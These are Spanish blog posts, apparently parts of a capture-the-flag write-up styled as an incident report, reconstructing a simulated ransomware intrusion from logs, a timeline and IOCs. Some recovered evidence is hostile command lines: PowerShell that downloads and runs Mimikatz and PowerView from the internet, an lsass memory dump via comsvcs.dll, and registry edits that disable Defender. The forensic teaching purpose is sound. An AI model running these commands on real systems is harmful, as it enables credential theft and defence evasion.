Baklava CTF Writeup – Incident Report Style (IV)

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

SRV01

Dado que es un activo crítico para la Organización, se solicita por su parte un análisis forense del servidor.

Se procesan en primer lugar los logs de eventos por Hayabusa, obteniendo los siguientes resultados de interés:

./hayabusa-2.17.0-lin-x64-gnu csv-timeline -d ../Logs -o ../hayabusa_srv01.csv

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

| Top high alerts:    │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

│ Suspicious Eventlog Clearing or Configuration Change Activity (267) │

│ Process Memory Dump Via Comsvcs.DLL (3)   │

│ ETW Trace Evasion Activity (2)            │

│ Lsass Memory Dump via Comsvcs DLL (2)     │

│ Disable Windows Defender Functionalities Via Registry Keys (2)  |

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

Si se investigan las alertas, parece que los atacantes han creado el servicio abjtTGiR, con el objetivo de volcar la memoria del proceso lsass.exe (y de esta forma poder acceder a los hashes de las credenciales):

2024-03-22 13:07:20.583 +01:00        Service Binary in Suspicious Folder           high       SRV01.megacorp.local  Sysmon         13           23869    EventType: SetValue ¦ RegKey: HKLM\System\CurrentControlSet\Services\abjtTGiR\ImagePath ¦ Details: %%COMSPEC%% /Q /c CMD.Exe /Q /c for /f “tokens=1,2 delims= ” ^%%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””‘) do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%%B \Windows\Temp\JuyTiUv5g.ico full ¦ Proc: C:\Windows\system32\services.exe ¦ PID: 636 ¦ PGUID: 5CD2ED58-580B-65FC-0B00-000000001300 ¦ User: NT AUTHORITY\SYSTEM       RuleName: T1031,T1050 ¦ UtcTime: 2024-03-22 12:07:20.573

2024-03-22 13:07:20.813 +01:00        Process Memory Dump Via Comsvcs.DLL              high       SRV01.megacorp.local         Sysmon 1              23870    Cmdline: C:\Windows\system32\cmd.exe /Q /c CMD.Exe /Q /c for /f “tokens=1,2 delims= ” ^%%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””‘) do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%%B \Windows\Temp\JuyTiUv5g.ico full ¦ Proc: C:\Windows\System32\cmd.exe ¦ User: NT AUTHORITY\SYSTEM ¦ ParentCmdline: C:\Windows\system32\services.exe ¦ LID: 0x3e7 ¦ LGUID: 5CD2ED58-580B-65FC-E703-000000000000 ¦ PID: 4420 ¦ PGUID: 5CD2ED58-7478-65FD-700B-000000001300 ¦ ParentPID: 636 ¦ ParentPGUID: 5CD2ED58-580B-65FC-0B00-000000001300 ¦ Description: Windows Command Processor ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18         CurrentDirectory: C:\Windows\system32\ ¦ FileVersion: 10.0.17763.1697 (WinBuild.160101.0800) ¦ IntegrityLevel: System ¦ OriginalFileName: Cmd.Exe ¦ ParentImage: C:\Windows\System32\services.exe ¦ RuleName: – ¦ TerminalSessionId: 0 ¦ UtcTime: 2024-03-22 12:07:20.811

De forma adicional, vía Sysmon se observa que los atacantes han manipulado la configuración de Windows Defender:

2024-03-22 13:06:46.123 +01:00        Disable Windows Defender Functionalities Via Registry Keys        high         SRV01.megacorp.local  Sysmon 13           23854    EventType: SetValue ¦ RegKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring ¦ Details: DWORD (0x00000001) ¦ Proc: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24020.7-0\MsMpEng.exe ¦ PID: 6832 ¦ PGUID: 5CD2ED58-5AD7-65FC-5E01-000000001300 ¦ User: NT AUTHORITY\SYSTEM         RuleName: T1089,Tamper-Defender ¦ UtcTime: 2024-03-22 12:06:46.121

2024-03-22 13:06:48.887 +01:00        Disable Windows Defender Functionalities Via Registry Keys        high         SRV01.megacorp.local  Sysmon 13           23861    EventType: SetValue ¦ RegKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet\SpyNetReporting ¦ Details: DWORD (0x00000000) ¦ Proc: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24020.7-0\MsMpEng.exe ¦ PID: 6832 ¦ PGUID: 5CD2ED58-5AD7-65FC-5E01-000000001300 ¦ User: NT AUTHORITY\SYSTEM RuleName: T1089,Tamper-Defender ¦ UtcTime: 2024-03-22 12:06:48.887

Se confirma la acción de los atacantes en los log de eventos de Windows Defender:

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:47

Id. del evento:5001

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

Se deshabilitó el examen de Protección en tiempo real de Microsoft Defender Antivirus para detectar malware y otro software potencialmente no deseado.

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:49

Id. del evento:5007

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

La configuración de Microsoft Defender Antivirus cambió. Si es un evento inesperado, debe revisar la configuración porque puede deberse a malware.

         Valor anterior: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting = 0x2

         Valor nuevo: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting = 0x0

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:49

Id. del evento:5007

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

La configuración de Microsoft Defender Antivirus cambió. Si es un evento inesperado, debe revisar la configuración porque puede deberse a malware.

         Valor anterior: N/A\SpyNet\LastMAPSFailureTimeString =

         Valor nuevo: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\LastMAPSFailureTimeString = 2024-03-22T12:06:49Z

Se investiga cómo han podido acceder los atacantes al equipo, encontrando dos accesos del usuario sqladmin vía Escritorio Remoto:

Nombre de registro:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

Origen:        Microsoft-Windows-TerminalServices-RemoteConnectionManager

Fecha:         22/03/2024 13:45:45

Id. del evento:1149

Usuario:       Servicio de red

Equipo:        SRV01.megacorp.local

Descripción: Servicios de Escritorio remoto: autenticación de usuario correcta:

Usuario: sqladmin

Dominio: megacorp

Dirección de red de origen: 10.0.8.25

[Nota: esta conexión es un residuo del CTF, no hay que tenerla en cuenta].

Nombre de registro:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

Origen:        Microsoft-Windows-TerminalServices-RemoteConnectionManager

Fecha:         22/03/2024 13:05:57

Id. del evento:1149

Usuario:       Servicio de red

Equipo:        SRV01.megacorp.local

Descripción:Servicios de Escritorio remoto: autenticación de usuario correcta:

Usuario: sqladmin

Dominio:

Dirección de red de origen: 192.168.20.42

El primer acceso se produce justo antes de la actividad maliciosa ya observada del usuario sqladmin, lo que confirma que el ataque de Kerberoasting contra la cuenta sqladmin ha sido exitoso, y que la contraseña no era robusta ya que ha sido rota en cuestión de minutos.

Se analiza la MFT del servidor, centrándonos en los ficheros creados o modificados el 22/03/2024, encontrando un fichero de interés:

2024-03-22 12:06:38                2024-03-22 12:06:38      2024-03-22 12:06:38       2024-03-22 12:06:38       154         lnk         \Users\sqladmin\AppData\Roaming\Microsoft\Windows\Recent\windowsdefender—.lnk

Se recupera el .lnk de la carpeta de recientes del usuario sqladmin, y se pasa por la herramienta LECmd.exe, obteniendo el siguiente resultado:

LECmd version 1.5.0.0

Processing C:\Users\antonio\Desktop\windowsdefender—.lnk

Extra data found in ftp case

Source file: C:\Users\antonio\Desktop\windowsdefender—.lnk

  Source created:  2024-12-01 12:17:57

  Source modified: 2024-03-22 12:06:38

  Source accessed: 2024-12-01 12:18:37

— Target ID information (Format: Type ==> Value) —

  Absolute path: Internet Explorer (Homepage)\windowsdefender:///

  -Root folder: GUID ==> Internet Explorer (Homepage)

  -URI ==> windowsdefender:///

Los atacantes han lanzado desde Edge un acceso directo a la Seguridad del servidor, posiblemente para ver si podían deshabilitarlo.

Así mismo, se confirma la ejecución del ransomware al aparecer tanto la nota de rescate como ficheros cifrados:

2024-03-22 12:34:43                2024-03-22 12:37:53      2024-03-22 12:37:53       2024-03-22 12:37:53       1576      txt         \files\readme.txt

2024-03-22 12:34:53                2024-03-22 12:34:53      2024-01-23 11:26:30       2024-03-22 12:34:53       2097184         baklava \files\confidential\conf-2024-1.docx.baklava

Si se buscan los ficheros modificados por el usuario sqladmin el 22/03/2024, se encuentra en el fichero C:\Users\sqladmin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt el historial de ejecución de Powershell, donde se observa el uso de Mimikatz para acceder a las credenciales del equipo:

Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -UseBasicParsing | Invoke-Expression

add-objectacl

whoami

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’)

Invoke-Mimikatz -Command ‘”privilege::debug” “token::elevate” “sekurlsa::logonpasswords”‘

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’)

Invoke-Mimikatz -Command ‘”privilege::debug” “token::elevate” “sekurlsa::logonpasswords”‘

ipconfig

Se concluye que los atacantes han llevado a cabo las siguientes acciones:

  1. Deshabilitado el antivirus Windows Defender.
  • Realizado un volcado de la memoria del proceso lsass.exe con la herramieta Mimikatz, con el fin de obtener las credenciales de los usuarios que habían iniciado sesión.
  • Iniciado sesión por Escritorio Remoto con el usuario sqladmin.

Conclusiones finales

Los análisis forenses realizados permiten resumir el ataque en las siguientes fases:

  1. En primer lugar, los atacantes envían un correo malicioso al usuario m.shutter (equipo WS01), conteniendo un enlace para la descarga de un fichero malicioso.
  • El fichero, al ser abierto, compromete el equipo con la herramienta de post-explotación Havoc y lanza un fichero PDF señuelo.
  • En WS01 existe una tarea que se ejecuta con privilegios y que está en un directorio sin restricciones. Los atacantes modifican dicha tarea para ejecutar un script de Powershell que les permite escalar privilegios.
  • Los atacantes dejan una persistencia en el inicio del usuario mshutter (script en el Startup) y localizan el equipo WS02, al que copian el fichero update.ps1 (otra copia de Havoc) y lo ejecutan vía PsExec comprometiendo dicho equipo.
  • En WS02 dejan de nuevo persistencia (en este caso vía una tarea programada), y realizan con la herramienta Rubeus un ataque de Kerberoasting contra la cuenta de sqladmin. 
  • Dado que inician sesión con el usuario sqladmin en SRV01 poco después, se asume que dicha contraseña ha sido vulnerable a un ataque de fuerza bruta. En este servidor los atacantes deshabilitan de forma manual el antivirus Windows Defender y proceden a volcar las credenciales en memoria con la herramienta Mimikatz.
  • Los atacantes parecen disponer al momento de las credenciales de los usuarios helpdesk y Administrador (se sospecha un posible ataque de Pass-the-Hash). Estos accesos son empleados para realizar una copia del Directorio Activo mediante el ataque DC Sync y para crear la cuenta administrad0r y hacerla administrador del dominio.
  • Los atacantes inician sesión por Escritorio Remoto con esta cuenta en DC02, instalan FIleZilla y lo emplean tanto para exfiltrar una BD de contraseñas de KeePass como para descargarse el ransomware PsRansom
  • El ataque termina con los atacantes detonando el ransomware y cifrando ficheros en SRV01.

Acciones de erradicación y recuperación

Se recomiendan las siguientes acciones de erradicación y recuperación:

  1. Búsqueda de todos los IOC en la infraestructura de la Organización, principalmente los relacionados con el C2 de Havoc y los nombres de los ficheros Powershell maliciosos.
  • Borrado de todos los ficheros maliciosos encontrados en los distintos equipos.
  • Cambio de contraseñas de todos los usuarios privilegiados de la Organización, haciendo especial hincapié en que se sigan unos criterios de robustez de las mismas. La misma acción debe llevarse a cabo con las cuentas de servicio.
  • Cambio de todas las contraseñas existentes en el fichero KeePass robado por los atacantes.
  • Cambio de contraseñas de todos los usuarios de la Organización (se recuerda que los ataques se han llevado una copia del Directorio Activo, por lo que tienen acceso a todos los hashes de las contraseñas, que pueden ser rotos con un ataque de fuerza bruta).
  • Restauración de las copias de seguridad de DC02 y SRV01 a un estado anterior al 22/03/2024 a las 12:00h UTC
  • Reinstalación completa de los puestos de usuario WS01 y WS02.

Línea temporal del ataque

Hora (UTC)EquipoFuenteUsuarioEvento
0:03:25WS01MFTN/ACreación del fichero C:\Schtask\check-updates.ps1
9:29:00WS01RAMmshutterCorreo malicioso desde contabilidadm3gac0rp@gmail.com
11:23:11WS01EventLog SysmonmshutterDescarga desde https://file.io/2UvVGDED0zrF
11:25:08WS01EventLog SysmonmshutterDescarga desde https://file.io/ufFVdF8eLeK8
11:26:00WS01EventLog SysmonmshutterDescarga de factura.iso desde https://file.io/zgsJx9hcnscg
11:26:17WS01EventLog SysmonmshutterMontaje de la ISO C:\Users\mshutter\Downloads\factura.iso
11:26:31WS01EventLog VHDMPmshutterMontaje de ISO – E:\factura\Factura.lnk
11:26:39WS01EventLog SysmonmshutterEjecución del powershell : E:\factura\f\p.ps1
11:26:44WS01EventLog SysmonmshutterMontaje de ISO – E:\Factura\f\enc.dat
11:30:22WS01MFTmshutterCreación del fichero C:\Users\mshutter\AppData\Local\Microsoft\OneDrive\Update\OneDriveUpdater.ps1
11:32:12WS01MFTN/ACreación del fichero C:\Schtask\update.dat
11:33:37WS01EventLog SysmonmshutterModificación del fichero C:\Schtask\check-updates.ps1
11:33:38WS01EventLog SysmonlocaladminEjecución de la tarea programada C:\Schtask\check-updates.ps1 (ahora maliciosa)
11:33:59WS01EventLog SysmonlocaladminEjecución del powershell C:\Schtask\check-updates.ps1
11:39:25WS01EventLog SysmonlocaladminCreacíón del fichero C:\Users\Public\update.ps1
11:39:47WS01EventLog SysmonlocaladminCreación del fichero C:\Users\Public\psexec.exe
11:40:09WS02MFTN/ACreación del fichero C:\update.ps1
11:41:06WS01EventLog SysmonlocaladminEjecución de PsExec contra WS02 ejecutando c:\update.ps1
11:41:07WS02MFTN/ACreación del fichero PSEXESVC.exe
11:42:49WS02MFTlocaladminCreación del fichero C:\Users\localadmin\AppData\Local\Microsoft\OneDrive\Update\OneDriveUpdater.ps1
11:43:07WS02MFTN/ACreación de la tarea programada OneDriveUpdateTask
11:47:59WS02PrefetchlocaladminEjecución de Rubeus35
11:51:27WS02PrefetchlocaladminEjecución de Rubeus contra la cuenta de sqladmin
11:51:27DC02EventLog SecuritylocaladminKerberoasting contra sqladmin desde la IP 192.168.20.42 (WS02)
11:54:39WS02PrefetchN/AEjecución de whoami.exe
12:05:57SRV01EventLog Terminal ServicessqladminInicio de sesión por Escritorio Remoto con sqladmin desde 192.168.20.42
12:06:46SRV01EventLog SysmonSYSTEMSe deshabilita Windows Defender
12:07:20SRV01EventLog SysmonSYSTEMVolcado de memoria del lsass.exe con Mimikatz (PowerSploit)
12:08:19DC02EventLog SecurityhelpdeskPosible DC Sync con Mimikatz
12:08:44DC02EventLog SysmonAdministradorCreación de la cuenta administrad0r
12:09:31DC02EventLog SysmonAdministradorSe añade el usuario administrad0r al grupo Admin de dominio
12:12:08DC02EventLog Terminal Servicesadministrad0rInicio de sesión por Escritorio Remoto de administrad0r
12:25:37DC02EventLog Sysmonadministrad0rDescarga de FileZilla portable
12:31:33DC02EventLog Sysmonadministrad0rConexión FTP contra 200.234.235.200
12:32:00DC02EventLog Sysmonftp1Exfiltración del fichero STOR management-passwords-1.kdbx
12:32:26DC02EventLog Sysmonftp1Descarga del FTP del fichero baklavasom.ps1
12:33:29DC02EventLog Sysmonadministrad0rEjecución del ransomware PsRansom C:\Users\administrat0r.MEGACORP\Desktop\baklavasom.ps1
12:34:36SRV01EventLog SysmonN/AAparecen los primeros ficheros cifrados en SRV01
12:34:43SRV01MFTN/AAparece la primera nota de ransom  C:\files\readme.txt
14:30:00N/AOrganizaciónN/APrimer contacto de la Organización con nosotros

Impacto

El impacto del incidente se considera como MEDIO para la Organización, ya que se han cifrado únicamente los ficheros de un servidor de la misma (del que se disponía de copias de seguridad), y la exfiltración de información se limita a un fichero de contraseñas (que ya han sido cambiadas como parte del proceso de recuperación).

Atribución

El incidente no deja evidencias suficientes como para poder realizar una atribución correcta del mismo, ya que el ransomware es un proyecto de GitHub libremente accesible.

El equipo de ciberinteligencia confirma que ninguno de los IOC o de las TTP observadas a lo largo del incidente permiten asociar el incidente a ninguno de los grupos de ransomware activos en la actualidad.

Lecciones aprendidas

El incidente deja las siguientes lecciones aprendidas:

  • Mejora de las capacidades de detección de correos maliciosos: se recomienda desplegar nuevas capacidades que permiten identificar correos con contenido malicioso (file.io es empleada con frecuencia por los atacantes debido a su carácter efímero, que dificulta el análisis).
  • Concienciación de los usuarios: así mismo, se deberían realizar los esfuerzos necesarios para dotar a los usuarios de la Organización de buenas prácticas de ciberseguridad, especialmente con respecto al uso seguro del correo electrónico.
  • Configuración correcta de permisos de directorios: los atacantes pudieron escalar privilegios al poder modificar una tarea privilegiada que estaba en un directorio no privilegiado. Se recomienda revisar y configurar correctamente estas carpetas.
  • Incremento de la robustez de las contraseñas: el ataque ha podido progresar en gran medida porque las contraseñas de los usuarios privilegiados no eran robustas. Se recomienda establecer de forma general políticas de contraseñas robustas.
  • Despliegue de un EDR: se recomienda el despliegue de una solución EDR (Endpoint Detection & Response), ya que posiblemente habría podido bloquear y alertar de una o varias partes de la cadena del ataque.

Anexo A: IOC

IP

200.234.235[.]200

URL

https://baklava014.duckdns[.]org/

https://file[.]io/zgsJx9hcnscg

https://file[.]io/2UvVGDED0zrF

Puertos no habituales

8800

Usuarios maliciosos

administrat0r

Usuarios afectados por los atacantes

sqladmin

helpdesk

localadmin

Ficheros

OneDriveUpdater.ps1

Update.ps1

Update.dat

Check_updates.ps1

Factura.iso

p.ps1

\baklavasom.ps1

FAQ (del meta, no del incidente)

Antonio, ¿le tienes manía a las imágenes?

No, soy un fan de las imágenes, pero cuando aportan algo. Muchos informes DFIR tienen muchas imágenes… pero para que entren en el Word, se reducen al 25% y no se ve absolutamente nada. Mucho mejor el texto para estos casos.

Además, el texto tiene una ventaja sobre las imágenes: es BUSCABLE. Es decir, dentro de 4 meses tienes otro incidente con este grupo de ransomware, y es tan fácil como abrir de nuevo el documento y darle a buscar (y así no tienes que ir mirando en 94 páginas de informe dónde está el nombre del fichero que te sonaba que había salido en este informe… o en uno de otros 14).

Oye, veo que esto es como una historia ¿No suelen ser los informes de incidentes mucho más parcos en plan “pasó esto aquí, tal día y de esta forma”?

La redacción de informes DFIR tiene dos corrientes filosóficas: el modo bitácora (donde se cuenta como una historia las acciones realizadas) y el modo informe de resultados (donde se cuenta lo que pasó en orden cronológico, aunando todos los trabajos).

Ambos enfoques son correctos: el modo bitácora es muy útil porque permite determinar qué se hizo en cada momento, y porqué se tomaron algunas decisiones en cada momento (por lo que no explica solo el incidente sino también la propia respuesta al mismo).

El modo informe de resultados es muy útil en incidentes muy grandes, en los que un modo bitácora haría prácticamente imposible el seguimiento, y se hace mucho más legible un orden (por ej: equipo a equipo).

Baklava CTF Writeup – Incident Report Style (III)

Contenido

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

WS01 – 192.168.20.41

Este equipo es el que ha ejecutado la parte cliente de PSEXEC contra WS02, por lo que se sospecha que puede ser el paciente cero del incidente.

Se ejecuta la herramienta Hayabusa con los logs de eventos, obteniendo los siguientes resultados:

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

 │ Top critical alerts:                        Top high alerts:                                                    │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Antivirus Password Dumper Detection (3)     Suspicious Eventlog Clearing or Configuration Change Activity (295) │

│ Defender Alert (Severe) (3)                 Suspicious PowerShell Parameter Substring (6)                       │ n/a                                         Script Interpreter Execution From Suspicious Folder (4)             │ n/a                                         ETW Trace Evasion Activity (3)                                      │

│ n/a                                         Antivirus Relevant File Paths Alerts (3)                            │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Top medium alerts:                          Top low alerts:                                                     │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

│ Reg Key Value Set (Sysmon Alert) (939)      n/a                                                                 │

│ ISO Image Mounted (78)                      n/a                                                                 │

│ Potentially Malicious PwSh (57)             n/a                                                                 │

│ Reg Key Create/Delete (Sysmon Alert) (55)   n/a                                                                 │

│ File Created (Sysmon Alert) (50)            n/a                                                                 │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌

Se revisan las alertas, encontrando los siguientes resultados de interés:

  1. Detección de la herramienta Rubeus (Nota: posiblemente sea parte de la organización del CTF, siendo un residuo del mismo)

“2024-03-22 13:47:19.126 +01:00″,”Antivirus Password Dumper Detection”,”crit”,”WS01.megacorp.local”,”Defender”,1116,227,”Threat: VirTool:Win32/Kekeo.A!MTB ¦ Severity: Severe ¦ Type: Tool ¦ User: MEGACORP\mshutter ¦ Path: file:_\\tsclient\_home_ub_Documents_share-vm\Rubeus.exe ¦ Proc: C:\Windows\explorer.exe”,”Action ID: 9 ¦ Action Name: Not Applicable ¦ Additional Actions ID: 0 ¦ Additional Actions String: No additional actions required ¦ Category ID: 34 ¦ Detection ID: {BEDBBF2C-AE5A-45D1-A944-E75B145F29F8} ¦ Detection Time: 2024-03-22T12:46:41.065Z ¦ Engine Version: AM: 1.1.24020.9, NIS: 1.1.24020.9 ¦ Error Code: 0x00000000 ¦ Error Description: The operation completed successfully. ¦ Execution ID: 1 ¦ Execution Name: Suspended ¦ FWLink: https://go.microsoft.com/fwlink/?linkid=37020&name=VirTool:Win32/Kekeo.A!MTB&threatid=2147756241&enterprise=0 ¦ Origin ID: 2 ¦ Origin Name: Network share ¦ Post Clean Status: 0 ¦ Pre Execution Status: 0 ¦ Product Name: Microsoft Defender Antivirus ¦ Product Version: 4.18.24020.7 ¦ Remediation User: ¦ Security intelligence Version: AV: 1.407.622.0, AS: 1.407.622.0, NIS: 1.407.622.0 ¦ Severity ID: 5 ¦ Source ID: 3 ¦ Source Name: Real-Time Protection ¦ State: 1 ¦ Status Code: 1 ¦ Status Description: ¦ Threat ID: 2147756241 ¦ Type ID: 0 ¦ Type Name: Concrete ¦ Unused2: ¦ Unused3: ¦ Unused4: ¦ Unused5: ¦ Unused6: ¦ Unused:”

2) Ejecución de un Powershell posiblemente malicioso (p.ps1) con el usuario mshutter y desde el directorio E:\Factura. El directorio E: no es de sistema, y el nombre de factura evoca a las campañas de .iso maliciosos, que al montarse contenían .lnk u otros contenidos maliciososo:

“2024-03-22 12:26:39.331 +01:00″,”Suspicious PowerShell Parameter Substring”,”high”,”WS01.megacorp.local”,”Sysmon”,1,15784,”Cmdline: “”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”” -ep bypass -nop -w hidden -NoExit .\f\p.ps1 ¦ Proc: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ User: MEGACORP\mshutter ¦ ParentCmdline: C:\Windows\Explorer.EXE ¦ LID: 0x5fa76c ¦ LGUID: 6A095527-648A-65FD-6CA7-5F0000000000 ¦ PID: 6996 ¦ PGUID: 6A095527-6AEF-65FD-B908-000000000900 ¦ ParentPID: 9132 ¦ ParentPGUID: 6A095527-648C-65FD-C901-000000000900 ¦ Description: Windows PowerShell ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271″,”CurrentDirectory: E:\factura\ ¦ FileVersion: 10.0.22621.1635 (WinBuild.160101.0800) ¦ IntegrityLevel: Medium ¦ OriginalFileName: PowerShell.EXE ¦ ParentImage: C:\Windows\explorer.exe ¦ RuleName: – ¦ TerminalSessionId: 3 ¦ UtcTime: 2024-03-22 11:26:39.308″

3) Ejecución del script C:\Schtask\check-updates.ps1 (directorio no habitual)

“2024-03-22 12:33:59.473 +01:00″,”Suspicious PowerShell Parameter Substring”,”high”,”WS01.megacorp.local”,”Sysmon”,1,16141,”Cmdline: “”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE”” -ep bypass -w hidden -NoExit C:\Schtask\check-updates.ps1 ¦ Proc: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ User: MEGACORP\localadmin ¦ ParentCmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule ¦ LID: 0x19cfe1e ¦ LGUID: 6A095527-6CA7-65FD-1EFE-9C0100000000 ¦ PID: 14128 ¦ PGUID: 6A095527-6CA7-65FD-2C09-000000000900 ¦ ParentPID: 2472 ¦ ParentPGUID: 6A095527-632E-65FD-3100-000000000900 ¦ Description: Windows PowerShell ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=0499440C4B0783266183246E384C6657,SHA256=D436E66C0D092508E4B85290815AB375695FA9013C7423A3A27FED4F1ACF90BD,IMPHASH=342A7FD0A3177AE5549A5EEE99F82271″,”CurrentDirectory: C:\Windows\system32\ ¦ FileVersion: 10.0.22621.1635 (WinBuild.160101.0800) ¦ IntegrityLevel: High ¦ OriginalFileName: PowerShell.EXE ¦ ParentImage: C:\Windows\System32\svchost.exe ¦ ParentUser: NT AUTHORITY\SYSTEM ¦ RuleName: – ¦ TerminalSessionId: 0 ¦ UtcTime: 2024-03-22 11:33:59.452″

El fichero está en la MFT, por lo que se solicita a la Organización:

2024-01-21 01:03:25                2024-03-22 19:47:45      2024-03-22 11:31:55       2024-03-22 11:31:55       258         258         ps1         \Schtask\check-updates.ps1   

[Read more…]

Baklava CTF Writeup – Incident Report Style (II)

Contenido

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

4.2. WS02 – 192.168.20.42

Se ejecuta la herramienta Hayabusa sobre los logs, encontrando las siguientes alertas:

──────────────────────────────────────

│ Top critical alerts:                   Top high alerts:                                                    │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

│ n/a                          Suspicious Eventlog Clearing or Configuration Change Activity (298) │

| n/a                                    ETW Trace Evasion Activity (3)                                      │

│ n/a                                    Important Log File Cleared (2)                                      │

│ n/a                                    Log Cleared (1)                                                     │

│ n/a                                    n/a                                                                 │

